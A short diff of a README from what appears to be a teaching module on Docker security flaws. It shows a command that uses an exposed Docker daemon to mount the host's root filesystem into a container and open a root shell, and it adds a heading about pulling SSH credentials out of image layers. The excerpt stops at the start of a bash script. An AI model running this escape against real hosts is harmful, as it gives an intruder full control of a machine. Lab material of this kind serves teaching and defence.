dabrowskiw/DSDS-modules/makeVM/modules/resources/Docker_Security_Flaws/README.md

 - `docker -H tcp://localhost:4444 run -v /:/mnt --rm -it alpine chroot /mnt sh`
 - mountings the hosts `/` directory to the `/mnt` directory in a new container, `chrooting` and then connecting via `shell`

-### 2)
+### 2) Exploit VM via investigating image layers

-Since it is possible to load images from the registry, we can further investiagte those.
+Since it is possible to load images from the registry, we can further investigate those.
 The workstation image contains ssh credentials for the vm.

 ```
 #!/bin/bash